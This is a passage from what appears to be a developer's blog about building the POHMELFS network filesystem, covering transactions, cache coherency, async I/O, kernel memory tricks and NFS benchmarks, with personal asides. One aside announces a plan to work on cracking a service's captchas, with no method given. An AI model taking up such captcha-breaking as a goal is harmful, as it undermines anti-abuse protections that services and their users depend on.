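    """Split `npages` dirty pages into transactions of at most `max_pages`.

    While the object is not yet known to exist on the server
    (`created` is False), every transaction carries the creation
    command, so the order in which the server processes them no
    longer matters.
    """
    transactions = []
    for first in range(0, npages, max_pages):
        count = min(max_pages, npages - first)
        transactions.append({
            "create": not created,   # repeat creation until the object exists
            "first_page": first,
            "pages": count,
        })
    return transactions
```

For a 200-page object this gives three transactions of 90, 90 and 20 pages, each with the creation command attached until the first acknowledge flips `created`.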
POHMELFS
just switched to faster transactions allocated one-by-one with
even smaller overhead (although it does not use kernel_sendpage()
for page sending yet, it copies data).
System does not serialize after all transactions are completed
(it waits after each one), but with
new transaction allocation it is 1.5 times faster: 98MB/s vs. 64MB/s,
note that without waiting for transaction completion it gets full wire speed of 125MB/s
with 1500 byte MTU. And it is with highmem pages and thus slow kmap()
of each one, and unmap after completion. I do not use ->sendpage()
since it will force to split proper set of iovecs into mixed
calls of kernel_sendmsg() and kernel_sendpage(),
which I want to avoid so far. Now it is (again) faster than NFS, but I want to move further.
So, solution is rather trivial: wait until several transactions
are completed. There is the whole infrastructure already there - in-flight transaction
storage, per-transaction completion and destruction callbacks, proper reference counting
and async completion.
Still only write transactions are used (i.e. reading/lookup and others will not
be redirected to different servers).
There are some bugs of course, but that's the first development version after all.
Just in case you notice some delay in filesystem or network development,
the reason is simple. I decided to devote some time to a new captcha cracking problem, namely these
ones:
The reason is simple: I want to test my captcha breaking
ideas on something which is real.
And also I was frustrated by their abuse team, which was not able to
fix the spam filter based on the messages I sent them (bounce and original, just as requested).
It is pretty unlikely though that something will appear anytime soon, but I do want to test some ideas...
POHMELFS
just got full transaction support. So far it is only used in the ->writepages()
callback, which is invoked by the writeback mechanism. POHMELFS uses lazy transaction support,
namely it waits after each transaction, which includes a header and data to be written for at most
14 pages. 14 is a magic number of pages which corresponds to the struct pagevec size
used by generic writeback; the transaction size is limited by a mount option and is 32 pages by default.
Performance dropped from 125 MB/s down to 64 MB/s, which is not acceptable.
The main problem is of course waiting for each transaction to be completed (i.e. for the completion message from the server).
There should not be per-transaction waiting; instead writeback has to allocate as many transactions as
needed and process them one after another, and only start waiting for them when there are no more
pages to be written. This is the next task.
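The "submit everything, wait once at the end" pattern can be illustrated in userspace with a thread pool. This is only an analogy for the planned kernel behaviour: `writeback`, `send` and the `workers` parameter are hypothetical, and the kernel code would rely on async completion callbacks rather than threads.

```python
from concurrent.futures import ThreadPoolExecutor, wait

def writeback(pages, send, per_transaction=14, workers=4):
    """Submit every transaction first, then wait once at the very end."""
    chunks = [pages[i:i + per_transaction]
              for i in range(0, len(pages), per_transaction)]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        futures = [pool.submit(send, chunk) for chunk in chunks]
        wait(futures)                    # the only blocking point
    # Results are returned in submission order, one per transaction.
    return [f.result() for f in futures]
```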
The transaction mechanism allows quite simple reconnection to different master servers in case of failure,
and rollback of the failed transaction. For example one can provide a number of main
servers (which have to be in sync with each other and be able to synchronize themselves,
or they can just use shared storage), so the POHMELFS client will switch between them if the current
one has failed. The system will detect it and reconnect; if the reconnect fails, the next server will be used
and the whole transaction will be resent there.
It is also possible to write a transaction to a different server on demand (it may or may not be connected
already, but it has to have an address structure, which so far is only obtained during pre-mount configuration),
which is a prerequisite for parallel data processing. One can create a simple patch to write transactions
one after another to servers in round-robin fashion.
Right now only write transactions are used (and can be combined with object creation if needed); read ones are pending,
as well as multiple parallel transactions (which is not complex, but the main task is how to wait for them all to be
completed; very similar code is used in pohmelfs_aio_read()).
There is also the pending task of cache coherency support (server-side originated messages
to clients which used the same pages that another client is writing into,
also including metadata coherency messages like uid/gid/inode size and other changes).
It is not that complex a task, and mostly requires server modifications.
It is heavily based on how netlink is implemented in Linux kernel.
Besides the fact that it is likely the most ugly and complex protocol
among communication models supported by the kernel, it is exactly the
most effective, extendible and feature rich one.
This model is based on the attributes, which are embedded into
the message. Each attribute has header, which includes size
of the attached data. So, one can put
effectively unlimited amount of data into any message (limited only by
size field and practical assumptions of the communication), and it is possible
to create message, which will contain any number of different attributes.
The main problem of netlink is its padding and alignment ugliness.
The protocol tries to squeeze every bit out of the communication, so there is a huge
amount of very hairy things there.
I like to drink and (un)fortunately I sometimes get pretty bad quality drinks,
but I'm absolutely sure that when Alexey Kuznetsov designed the netlink attribute alignment
policies he had a really bad hangover after likely the worst crap he ever drank.
So, netlink attributes are very ugly, but you can extend them however you like.
The same applies to POHMELFS transactions.
You can put any new attribute into the transaction in a very trivial manner (I worked
with netlink a lot, even created
kernel connector
to simplify the kernel development side, so I know that taste). Although the transaction size is limited,
it is controlled only by a mount option (the default is 32 IO vectors, each one
of PAGE_SIZE (4k on x86), in one transaction).
Thus one can easily implement for example any protocol security labeling:
just add a new per-packet attribute.
So, it is easily possible to extend the communication protocol indefinitely with full backward
compatibility.
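To make the attribute idea concrete, here is a minimal type/length/value sketch. The header layout (16-bit type, 32-bit size, network byte order, no padding) is an assumption chosen for the example; it is neither the netlink format nor the actual POHMELFS wire format.

```python
import struct

HEADER = struct.Struct("!HI")   # attribute type (16 bit), payload size (32 bit)

def pack_attrs(attrs):
    """Encode (type, payload) pairs back to back, each with its own header."""
    return b"".join(HEADER.pack(t, len(p)) + p for t, p in attrs)

def unpack_attrs(buf, known):
    """Decode a message, skipping attribute types not listed in `known`."""
    out, off = [], 0
    while off < len(buf):
        t, size = HEADER.unpack_from(buf, off)
        off += HEADER.size
        if t in known:
            out.append((t, buf[off:off + size]))
        off += size                  # the size field lets us skip unknown attributes
    return out
```

Backward compatibility comes from the size field: an old receiver that does not know a new attribute type (say, a security label) can still step over it and read the rest of the message.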
The only thing missing is photo skills...
But I work on it.
After I've spent quite a lot of money I suddenly decided that
it is a really good feeling - to have what you want, no matter what the price is.
I can not afford some things, but looking really closely I've decided
that having lots of smaller really cool stuff is better (for now) than collecting
for a (really) long time to get something really big. I already did that,
now it's time for smaller every-day fun :)
So, no bike for now. I was torn between Honda CBR 400-600, BMW K1200 or around,
or classical chopper models, no Harley of course, but... Anyway I'm not
able to register it and get bike numbers, and I do not have a bike driving license.
The same applies to cars (what I already had I really do not want to get again, but what I want
requires some). So, my simple stuff.
POHMELFS
just got initial transactions support and ability to connect to multiple master servers.
Master servers are those which say where data is placed. Essentially
they are the same servers which may provide that data, but main server addresses are
provided at pre-mount configuration time, and data server addresses will be provided
by main servers (if the main ones do not want to return data) at run time.
Main servers can also be used to request data in parallel or to switch between them
when the currently active one has failed.
So far this is theory; practice is rather miserable: the POHMELFS client connects to
multiple servers, but works with only one. Errors are detected, and a switch to the next
server could happen, but it is not done, since there is a serious problem with this
approach: neither server nor client supports
ACID for data being written.
Here we come to the introduction of transactions: a transaction is multiple commands wrapped into a
single atomic operation. In case of an error during a transaction
write, the whole transaction will be resent to a different server (or the same one after reconnect).
This is rather simple (although transactions are not supported by the server yet and the client
does not wrap any command into them yet), but it still does not solve the ACID problem.
Since POHMELFS has a writeback cache, its writes do not reach the server directly; instead writeback
is scheduled by the system, and it starts writing pages to the server. The current POHMELFS implementation
uses only the ->writepage() method, which is invoked for each page.
It does not require the server to return an explicit acknowledge that the page was written;
instead it relies on the underlying transport protocol (like TCP) to handle guaranteed delivery,
so data can be queued somewhere when the connection is dropped, and the POHMELFS client
does not know if the data was really written or not. Having a per-page acknowledge can fix the
ACID problem really trivially, but that may (or may not) end up with severe performance
degradation. As a better solution I consider my own ->writepages()
implementation, where each transaction will contain multiple pages to be written,
and thus a smaller number of explicit acks has to be received from the server, and thus smaller performance
degradation. In case of failure the whole transaction has to be resent to a different server of
course.
Server does not support data mirroring to multiple root directories yet, so actually
not too much is implemented from above description, but transactions and multiple
server connections exist and soon client will get support for reconnection and proper
transaction processing.
Transaction support will be added into kernel client.
It is possible that it will be exported to userspace (thus
it will be synchronous write-through operations).
Also kernel client will get locking support (fcntl()
ones first, then more fine-grained ones), this is different from
byte-range
read/write locking, which will be done on server. It is possible to export
it to client too (and will be part of POHMELFS locking API actually, which will
be used for fcntl() too).
The simplest case is data invalidation in the client's cache (i.e. if one client
issued a writeback for a given page, it has to be marked as not up-to-date on other
clients). Likely it will be done at the beginning of the next week. So far it
will be the last cache coherency item. The task is really simple because of
asynchronous processing of all data in the kernel client. The server will have
to store not only the index of directories to watch for object changes there,
but also a per-object set of pages read by each client, so that the appropriate
users can be notified that a page is no longer up-to-date and has to
be refreshed.
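A rough sketch of the per-object page bookkeeping, under the assumption that the server records readers per page index. `PageTracker` and its methods are hypothetical names used only to show which clients would receive an invalidation.

```python
from collections import defaultdict

class PageTracker:
    """Per-object record of which client has read which page index."""

    def __init__(self):
        self.readers = defaultdict(lambda: defaultdict(set))

    def read(self, client, obj, page):
        self.readers[obj][page].add(client)

    def writeback(self, writer, obj, page):
        """Return the clients whose cached copy of the page is now stale."""
        stale = self.readers[obj][page] - {writer}
        # Stale clients must re-read the page before they count as readers again.
        self.readers[obj][page] = {writer}
        return sorted(stale)
```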
The userspace server will get parallel and distributed facilities. Parallel processing
will be done first by allowing lookup and readdir callbacks to return information
about objects which will contain the address of the server where the object is actually
located, so that server could read, write or check status there. So far the whole
file will be stored on one server, i.e. in the first implementation it will not
be possible to store half of the file on one server and the other half on a different
one. Then it can be extended.
The server will get the ability to store data in different root directories (in such a way that the client
is not able to see shadow copies). There will be simple regexp policies for data storing,
for example '*.jpg' has to be stored in root1 and root2, '*.txt' only in root1 and so
on. Each root directory can be a local or a remotely mounted one, userspace does not care
about this.
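The storing policy could look roughly like this. The text says "regexp", but the examples are shell-style patterns, so this sketch uses `fnmatch` globbing instead; the policy table, the function name and the default root are all assumptions for illustration.

```python
from fnmatch import fnmatchcase

# Hypothetical policy table: the first matching pattern wins.
POLICIES = [
    ("*.jpg", ["root1", "root2"]),
    ("*.txt", ["root1"]),
]

def roots_for(name, policies=POLICIES, default=("root1",)):
    """Return the root directories an object with this name is stored in."""
    for pattern, roots in policies:
        if fnmatchcase(name, pattern):
            return list(roots)
    return list(default)   # assumed fallback for names no policy matches
```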
The main part is already completed: I have a vision of what the system has to provide and what
it will look like, so with good design of the low-level mechanisms it becomes
a doable task for a predictable timeframe.
This is a high performance network filesystem with local coherent cache of data and metadata.
Its main goal is distributed parallel processing of data. Network filesystem is a client transport.
POHMELFS protocol was proven
to be superior to NFS in lots (if not all, then it is in a roadmap) operations.
Basic POHMELFS features:
Local coherent (notes 1 and
2) cache for data and metadata.
Completely async processing of all events (hard and symlinks are the only exceptions) including object creation
and data reading.
Flexible object architecture optimized for network processing. Ability to create long paths to objects and remove arbitrarily
huge directories in a single network command.
High performance is one of the main design goals.
Very fast and scalable multithreaded userspace server. Being in userspace it works with any underlying filesystem
and still is much faster than the async in-kernel NFS one.
Roadmap includes:
Server extension to allow storing data on multiple devices (like creating mirroring), first by saving data in several
local directories (think about server, which mounted remote dirs over POHMELFS or NFS, and local dirs).
Client/server extension to report lookup and readdir requests not only for local destination, but also to different
addresses, so that reading/writing could be done from different nodes in parallel.
Strong authentication and possible data encryption in the network channel.
Extend client to be able to switch between different servers (if one goes down,
client automatically reconnects to second and so on).
Async writing of the data from receiving kernel thread into userspace pages via copy_to_user() (check development tracking
blog for results).
From my developer's point of view Solaris first sucks because of its
contributor agreement.
There is no way I can devote my time to organization, which will get my work for free
and do whatever they want with it without my opinion as author (Actually the same
applies to BSD-style at some degree. Yes, that can be trivial greediness).
It is not _that_ bad an OS, but there is no known practice in modern medicine of raising the dead.
Solaris has its niche, but that's it. Linux can be tuned to be faster in those areas (or if it has
some bugs, they can be fixed), but that does not matter: people who make
decisions already know what they want.
Pseudo openness of the Solaris is just a marketing noise. Those who want to hear it will hear
just that, no matter how things are in real life.
Is scheduled for tomorrow, today I have to prepare myself for it.
The whole idea and implementation started during fun new year vacations,
so I have to repeat process at least at some degree...
This release will not include direct writing to userspace from the async thread,
since this approach happened to be really non-trivial. What I
described
for the page fault handling works only for the first fault: when the page is populated into
the table, it can be referenced and written into, and things just work. The problem
happens when the same page is used for a second read (i.e. a new try from userspace,
for example if the size of the written data is increased to more than two pages, 'cat'
will use the same two pages to read data). With the second write from the kernel there will be a
page fault again, although the page exists in the table, and the fault can not be handled
(at least its reason will not be removed, since it will happen again and again), since
the page table entry looks really good for the system, but not for the CPU.
I checked two cases: usual copy_to_user() from kernel on behalf of
userspace thread invoked a read syscall, and the same code, but copy was performed
from the different thread. Page table entry (pte) looks very similar in both cases
(in regards of all flags at least), but fault happens for the second write into the same
page always, when thread's mm context was changed to point to original userspace one.
This does not change if userspace thread was or was not scheduled away from its CPU.
Difference from get_user_pages() in this part is mainly the fact, that the resulting page is locked
in the kernel (by increasing its reference counter at least), but I still want to produce the same
behaviour as usual page fault during copy on behalf of userspace thread.
So, I am stuck with this problem, but since it is very interesting I will find a solution.
Meanwhile, this release will include following things:
POHMELFS client. Full client side caching. Async operations for all major events
(not including copy_to_user() hack described previously, but just async
notifications and copy on behalf of original userspace thread).
Support for usual files and directories only, special files like
device files or pipes are not interesting at this point, and are quite simple to implement, but
so far there is no need for that. Client has support for object creation/removal
cache coherency messages.
POHMELFS userspace server. Object creation/removal cache coherency message broadcasting will
be commented out, no locking.
It happened to be really trivial. Even no VM hacking :(
First, some background on how copy_to_user() works on x86.
Its asm looks pretty simple (and it is very small, check
arch/x86/lib/usercopy_32.c:__copy_user()),
so I always wondered how it can handle missing-page-exception,
when userspace page was swapped out.
Things live in a small part of the function: .section __ex_table,
this table contains two values: place where exception happened, and fixup address
(it is just instruction positions). Linker puts this table into special section,
accessible by page fault handler do_page_fault(). In some
cases page fault path is never executed, code just searches for page and locks it,
even if it is already in the table (that is why get_user_pages()
is at best as fast as copy_to_user()). This happens when
WP bit is not set and does not work
(a speculation only though, derived from __copy_to_user_ll()
and Intel F00F bug errata).
When WP bit works, we have usual copy_to_user(), which will
fault if there is no destination page, and do_page_fault() eventually
will be called. After number of checks system determines that it is exception
in kernel mode and if there is above exception table (which is true for
copy_to_user()), it tries to fix things up.
Here we come to essentially the same code, what is called in get_user_pages():
we locate VMA for failed address and insert new page into page table, this involves allocation
of all those strange 3-letters abbreviations: pgd, pud, pmd and pte ('and' is not VMM abbreviation yet),
I know what two or three of them mean, but completely forgot pud, on 4 level page table
it is hard to recall which two are the same, since iirc x86 has only 3 levels.
If page was swapped out, it will be brought back and eventually fault handler will
try to fix things up via fixup_exception(), which will
replace EIP with appropriate value from the section table described above, so that
CPU will return back to __copy_user() code and continue (or not, depending
on fact that page exists or not) its execution.
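
The table lookup described above can be modelled in plain userspace C. This is only a sketch under assumptions: the struct layout, the addresses and the name search_fixup() are made up for illustration, and the real kernel uses its own sorted table and search helpers. It just shows the idea of mapping a faulting instruction address to the address where execution should continue.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical model of one __ex_table entry: address of an instruction
 * that may fault, and the address to resume from if it does. */
struct ex_entry {
	unsigned long insn;
	unsigned long fixup;
};

/* Binary search over a table sorted by insn. Returns the fixup address,
 * or 0 if the faulting address has no entry (nothing to fix up). */
unsigned long search_fixup(const struct ex_entry *tbl, size_t n,
			   unsigned long fault_ip)
{
	size_t lo = 0, hi = n;

	assert(tbl != NULL || n == 0);
	while (lo < hi) {
		size_t mid = lo + (hi - lo) / 2;

		if (tbl[mid].insn == fault_ip)
			return tbl[mid].fixup;
		if (tbl[mid].insn < fault_ip)
			lo = mid + 1;
		else
			hi = mid;
	}
	return 0;
}
```

In this model the fault handler would call search_fixup() with the saved instruction pointer and, if the result is non-zero, store it back as the new instruction pointer before returning.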
So, how to hook into above mechanism and allow completely different process to write data
into userspace? Quite trivially: above fixup (VMA searching and 3-letters abbreviation allocations)
happens for particular mm_struct, which contains VMA list, page table lock
and other (likely very) essential information to handle memory management. This structure is obtained
from the current thread executed on the CPU, so by replacing mm_struct in our kernel thread with
userspace thread's one, we can safely copy data to and from userspace. There is a race of course,
when userspace thread will want to access its own mm_struct (copied to kernel thread) for example
calling mmap() or copy_*_user() from kernel, so we have to be careful and
properly guard against that.
Example code which does copy to userspace from kernel thread can be found in
archive. Just
replace kernel path in Makefile to your own, call make and insert module.
Each reading from /dev/tcopy file will end up with copy of data from kernel
to userspace in dedicated kernel thread.
While moving home I thought a lot about cache coherency issues.
While we believe that NFS has coherent cache, since it is somewhat
write-through, its cache actually is not synchronous, since between
object creation and moment when other clients see new object really a lot
of time can pass, for example when client, which creates an object, has
slow link... So, object creation and removal should not be synced to other
clients during writeback on one of them, instead clients which are interested
in object perform a lookup, which may or may not return object, this is not a
race or cache non-coherency, this is usual multithreaded environment without
client's synchronization.
What we really care about, is data consistency on the server. When we have
multipage write, which overlaps with another write from different client,
we should not read data back from the middle of the transactions. Locking the
whole file is not an issue, instead proper byte-range (page-range actually)
locking has to be implemented. I already have a
prototype,
but have to check it in real life.
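
To make the page-range idea concrete, here is a minimal userspace sketch of the overlap check such locking needs. It is not the prototype mentioned above: the 4k page size, the struct and all function names are assumptions for illustration, and a real server would keep held ranges in something better than a flat array.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

#define PAGE_SHIFT_SKETCH 12	/* assumption: 4k pages */

struct page_range {
	unsigned long first;	/* first page index, inclusive */
	unsigned long last;	/* last page index, inclusive */
};

/* Convert byte offset and length (len > 0) into the covered page range. */
struct page_range bytes_to_pages(unsigned long long off, unsigned long long len)
{
	struct page_range r;

	assert(len > 0);
	r.first = (unsigned long)(off >> PAGE_SHIFT_SKETCH);
	r.last = (unsigned long)((off + len - 1) >> PAGE_SHIFT_SKETCH);
	return r;
}

bool ranges_overlap(struct page_range a, struct page_range b)
{
	return a.first <= b.last && b.first <= a.last;
}

/* True if 'want' overlaps none of the ranges already held by other clients. */
bool can_lock(const struct page_range *held, size_t n, struct page_range want)
{
	for (size_t i = 0; i < n; i++)
		if (ranges_overlap(held[i], want))
			return false;
	return true;
}
```

Two writes that touch the same page conflict even if their byte ranges do not intersect, which is why the comparison is done on page indexes.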
So, other competing projects may or may not follow my way and drop
creation/removal/stat coherency from the TODO list (afaics, no one implemented
that yet :) based on my analysis and concentrate on server read/write locking.
And I will start some bits of VM hacking: plan is to implement generic enough
(well, working on x86 for start :)
mechanism to copy data from different (i.e. not that one which
started a syscall) thread to userspace, while original one sleeps in syscall,
via copy_to_user(). Likely it will be somewhat similar to what
I did for zero-copy userspace sniffer
and how get_user_pages() work.
Result, which has to be as fast as usual copy_to_user(), otherwise it is not
interesting solution, will be used in POHMELFS client and its async reading.
Client 1 Client 2
# ls -a /mnt/
. ..
ls -a /mnt
. ..
echo qwe > /mnt/asdasd
sync
ls -a /mnt/
. .. asdasd
rm -f /mnt/asdasd
sync
ls -a /mnt/
. ..
dmesg | tail -n1
pohmelfs_remove_response: parent: 2, path: '//asdasd'.
ls -a /mnt
. .. asdasd
As you might have noticed, when one client creates an object and it is written back
to server (during writeback), it is broadcast to all clients, which read the same
directory before. This information is stored on server in binary tree, so it takes
(M-1)*O(log(N)) time, where M is total number of clients and N is number of directories
they read. This can be further optimized though.
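
The cost estimate above can be illustrated with a small userspace sketch. The server described here keeps this information in a binary tree; the sketch swaps that for a sorted array per client searched with bsearch(), which gives the same O(log(N)) lookup per client. All struct and function names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>

struct client {
	const unsigned long *dirs;	/* sorted inode numbers of directories it read */
	size_t ndirs;
};

int cmp_ino(const void *a, const void *b)
{
	unsigned long x = *(const unsigned long *)a;
	unsigned long y = *(const unsigned long *)b;

	return (x > y) - (x < y);
}

/* Store in 'out' the indexes of all clients, except 'origin', which read
 * directory 'dir'. Returns how many were found. 'out' must have room for
 * nclients entries. */
size_t clients_to_notify(const struct client *c, size_t nclients,
			 size_t origin, unsigned long dir, size_t *out)
{
	size_t found = 0;

	assert(c != NULL && out != NULL);
	for (size_t i = 0; i < nclients; i++) {
		if (i == origin || c[i].ndirs == 0)
			continue;
		if (bsearch(&dir, c[i].dirs, c[i].ndirs, sizeof(dir), cmp_ino))
			out[found++] = i;
	}
	return found;
}
```

The loop visits M-1 clients and does one logarithmic search for each, which is where the (M-1)*O(log(N)) figure comes from.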
Objects are not removed from clients, when one of them removes it (and this is synced
to server via writeback), since so far I can not call sys_unlink() directly
from module, and I have not yet written code to deal with dentry cache (that will be simple),
instead you can see in dmesg, that other clients received a command and just need to drop
inode and dentry.
Also inode information is not broadcast yet (for example when file size increases
or access rights are changed), so new files have always zero size. This information should be
broadcasted during writing, and since server is heavily multithreaded, this should not
hurt performance.
There is different opinion though: we do not need cache coherency at all, since the last writer
will overwrite data anyway, and when we open new object, we first look it up on server,
so if it was created there, it will be opened, but if it exists only in cache on some other client, we
do not know about it anyway. We can broadcast above messages during object creation on clients,
but this will be effectively write-through cache, since we can create object on server that time.
Anyway, I will proceed with either remove/stat messages, or with ability to copy data to userspace
from different thread. The latter looks like very interesting hack.
Moved to the 'Leroy Merlin' development shop to get lots of stuff and
found so huge crowd of people, that decided to run away as quickly as possible.
While walking there found couple of interesting things:
wood plates from small to 2000x600, which are perfectly polished, have
acceptable for table/shelf/cupboard development thickness, and have too small price
to resist to buy. When I started my table development there were no such things
in broad usage at all, but I will not stop, just because I found materials,
which allow to build it much faster and simpler. But for usual shelves I will definitely
get it there and will not implement things myself from real wood plates (those
ones are made using glueing technology from much smaller plates, I used similar to
implement thick enough part of my 'L'-style table).
bath cabins are incredibly ugly and unacceptably badly made. I knew that before though.
found bar installation, which I want to set up at home - likely it will be my only
table in kitchen, I like it very much.
my kitchen (actually right now it is heavily used as joinery only)
has only 3/4 of walls covered with wallpapers, today I learned, that
my wallpaper model will not be sold anymore, so either I will have to reglue most of the
kitchen, or I will create some interesting installation on the remaining part of the walls,
and I think I already know what to put there: just like my blue wall in the room,
I will put some brick-like elements in the kitchen. As a ceiling light I will install a huge
wood beam hinged on chains with attached small lights. Or maybe not, who knows...
At home I attached '_' part of my 'L' table (it is not exactly 'L', but rounded very much),
and started the last painting layer. Also attached holders to the walls where table will be located
(my huge 2000x1500 or so table has only single leg close to the end of the longer part
of letter 'L', other parts are attached to the walls).
Maybe I will even install it tonight if the colour is ready.
He writes new or extends existing, but it is from different series.
This one will tell you how one will be able to build a distributed
and then parallel filesystem using POHMELFS.
Headline says it all: POHMELFS server will not be placed into kernel
so far, since it is already very fast (compared to in-kernel async NFS server),
and userspace programming is a bit easier and mostly because there is no
need to wait about 10 minutes while servers come up after ipmi reboot,
since they are located somewhere I do not know where and there is no possibility
to quickly reboot them by hand, so servers have lots of things to bring themselves
up even if something was really screwed, like network boot, add here scsi probing,
possible fsck, initial bios memtest (8GB)...
So, planned POHMELFS server updates:
PMCC - poor man's
cache coherency protocol. Scheduled for the first half of the next week, btw.
server extension to allow storing data on multiple devices (like creating mirroring),
first by saving data in several local directories (think about server, which mounted remote
dirs over POHMELFS or NFS, and local dirs).
client/server extension to report lookup and readdir requests not only for local destination,
but also to different addresses, so that reading/writing could be done from different nodes
in parallel.
Somewhere at the beginning there is also a task to extend client to be able to
switch between different servers (if one goes down, client automatically reconnects to second
and so on).
And the most complex task is server parallelization, i.e. ability to have multiple
servers, which handle the same metadata, to work in parallel and be coherent. AFAIK, there
are no such (at least open) solutions, neither Lustre, nor PVFS2, nor Ceph,
nor glusterfs, nor whatever.
There are solutions to have master-slave setup (IIRC, Lustre works that way), Ceph has ability
to spread metadata between multiple servers, but they do not handle the same sets of objects,
so there is no metadata server redundancy.
So far I consider this as the most complex part, and I have not yet come to solution.
Rusty Russell is an author of the vringfd() (name says it all) new
interface for the event ring buffer management. Quotation from Andrew Morton:
This is may be our third high-bandwidth user/kernel interface to transport
bulk data ("hbukittbd") which was implemented because its predecessors
weren't quite right. In a year or two's time someone else will need a
hbukittbd and will find that the existing three aren't quite right and will
give us another one. One day we need to stop doing this ;)
...
So I think it would be good to plonk the proposed interface on the table
and have a poke at it. Is it compat-safe? Is it extensible in a
backward-compatible fashion? Are there future-safe changes we should make
to it? Can Michael Kerrisk understand, review and document it? etc.
You know what I'm saying ;) What is the proposed interface?
Just for the reference, I've filed it under kevent
tag :)
As you might know,
POHMELFS is a network
filesystem with client's cache of data and metadata. Any place with cache has to
provide cache-coherency algorithm to sync data with other users.
There are two common cases when caches become non-coherent:
client created/removed/modified object, which is not shared with other clients (i.e. this
object does not exist in their caches and no object with the same name was created on different
clients)
object being handled by one client exists in other caches
Poor man's solution for the above problems resolves quite easily: client will flush its changes
to whatever objects it wants during local writeback, these changes are then propagated to all
other clients, which worked with parent object (this information will be stored in server
each time client reads dir or performs a lookup). For the first non-coherent case above client
will just receive a new object from the server, which will be easily imported into existing tree
(because of async nature of the POHMELFS it is trivial task, which right now works out of the box,
although only on client). For the latter case there might be problem if local object was modified:
in this case we can either replace its content with new data, or (better) rename local object to
something different (like old name plus sync time), so that user could merge data manually.
So far there will be no locks, which will be implemented next.
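
A minimal sketch of the "old name plus sync time" rename from the paragraph above. The '.' separator, the decimal timestamp format and the function name collision_name() are assumptions for illustration only; nothing here is taken from actual POHMELFS code.

```c
#include <assert.h>
#include <stdio.h>

/* Build "<name>.<sync_time>" into buf.
 * Returns 0 on success, -1 if the result does not fit into 'size' bytes. */
int collision_name(char *buf, size_t size, const char *name,
		   unsigned long sync_time)
{
	int n;

	assert(buf != NULL && name != NULL);
	n = snprintf(buf, size, "%s.%lu", name, sync_time);
	return (n < 0 || (size_t)n >= size) ? -1 : 0;
}
```

With such a scheme a locally modified object keeps its data under the suffixed name, while the original name goes to the version received from the server, so the user can merge them by hand.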
After I spent two days implementing real AIO for POHMELFS, following things happened:
Implemented 3 different AIO schemes, two of which could be zero-copy. Here is a brief description of them.
First, POHMELFS ->aio_read() callback schedules number of pages to be read from the server
(if page is already up-to-date, it is copied to userspace, otherwise network request is being sent), then
it waits...
when async data is received from remote side, appropriate inode and pages are found, then (physical)
userspace page is locked in memory and data is either received into that page, or received into VFS
cache page and then copied into userspace one. Then userspace page is unlocked.
when async data is received (note that it is received completely asynchronous in different thread) into
VFS cache page, receiving thread copies data into userspace via copy_to_user(). Since receiver
thread has completely different virtual memory layout, it can not simply copy data to provided userspace address,
first it has to setup page tables to be equal to userspace thread layout, in theory setting CR3 register
on x86 should be enough, but that's only theory, I was not able to fully complete this method, since eventually
thread crashed (obviously: userspace thread could be still active on different CPU, so installing the same CR3 register
for different CPUs pointing to the same page tables leads to crappy things). This interesting hack can be finished though.
when async data is received, pages are marked as ready and placed into list, so userspace thread can copy
them back via copy_to_user(). The simplest method. And it works great (graphs below).
found a bug in 2.6.25-rc7 shmem when removing 1gb file from it:
Bad page state in process 'rm'
page:c49948c0 flags:0xf7d4a600 mapping:00000000 mapcount:0 count:0
Trying to fix it up, but a reboot is needed
Backtrace:
Pid: 9454, comm: rm Not tainted 2.6.25-rc7 #11
[] bad_page+0x52/0x7a
[] free_hot_cold_page+0x5e/0x15a
[] __pagevec_free+0x18/0x22
[] release_pages+0xfb/0x142
[] __pagevec_release+0x15/0x1d
[] truncate_inode_pages_range+0xea/0x29f
[] __link_path_walk+0xa7e/0xb28
[] truncate_inode_pages+0x9/0xc
[] shmem_delete_inode+0x26/0xac
[] shmem_delete_inode+0x0/0xac
[] generic_delete_inode+0x88/0xec
[] iput+0x60/0x62
[] do_unlinkat+0xb7/0xf9
[] do_page_fault+0x2b6/0x6c2
[] do_page_fault+0x31e/0x6c2
[] sys_ioctl+0x2c/0x43
[] sysenter_past_esp+0x5f/0x85
[] pci_scan_single_device+0x377/0x446
Did not try to investigate (this is my testing server, not tainted with POHMELFS code).
Ran multiple tests...
Test details for the second round of POHMELFS vs NFS fight.
Hardware and software was already described in the first round,
I need to note, that server (2.6.25-rc7) has all debugging options turned off.
Tests performed: kernel tree reading
(find linux-2.6.24.4 -type f | xargs cat > /dev/null)
from disk over the net (XFS filesystem, cold server and client caches) and big file reading
from the tmpfs (to eliminate server disk latencies). Graph was added to the previous round results.
Note that async NFS and POHMELFS behave very similarly with operations which involve reading from the disk,
that is because of disk latencies (although 10krpm SCSI disk used allows about 80 MB/s sequential read,
XFS behaves quite badly with lots of small files), tmpfs comparison shows advantages of the
POHMELFS network protocol.
Reading from huge remote tmpfs file is about 2 times faster for POHMELFS because of its AIO implementation,
although it is not main reason - server was almost always capable of handling requests from the POHMELFS client
one-by-one using one thread, which saturated bandwidth for about 70% (add here all debug options turned on on client).
One of the main factors I think is readahead being turned off - sync readahead has zero advantage in asynchronous
network filesystem, since while it waits for readahead to complete, it could schedule new requests, while
->readpage() method used in readahead waits until page is transferred, and only then
readahead code schedules new request. One can implement ->readpages() though.
Kernel tree reading micro-benchmark was also performed: POHMELFS has 2-times win because of its network protocol, which
batches (via TCP_CORK only though, I think I need to implement better directory reading command) server replies.
Another solution is to correctly implement transactional model, which is next task now.
Because of completely asynchronous POHMELFS
nature
it is possible to implement multithreaded server, where not only requests from
different clients are processed in parallel, but also async requests from the
same users are handled simultaneously by pool of threads.
Such multithreading requires introducing a transactional model of the communications,
for example for object creation followed by writing data: right now this race is handled
by sending a reply after creation, so the whole writeback sleeps waiting for that,
which drops performance (to NFS level). A transaction, on the contrary, will contain both operations,
which will be processed by the same thread without race. It can also handle
other problematic places with multiple server threads.
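
The race and its transactional fix can be shown with a toy model. This is a sketch only: the operation types, structs and run_transaction() are invented for illustration and say nothing about the real wire format. The point is that when creation and writes travel in one transaction and are applied in order by one thread, a write can never be processed before its object exists.

```c
#include <assert.h>
#include <stddef.h>

enum op_type { OP_CREATE, OP_WRITE };

struct op {
	enum op_type type;
	size_t len;		/* bytes written, unused for OP_CREATE */
};

struct object {
	int exists;
	size_t size;
};

/* Apply all operations of one transaction in order, as a single server
 * thread would. Returns the number of operations applied and stops at
 * the first one which can not be applied. */
size_t run_transaction(struct object *obj, const struct op *ops, size_t n)
{
	size_t i;

	assert(obj != NULL);
	for (i = 0; i < n; i++) {
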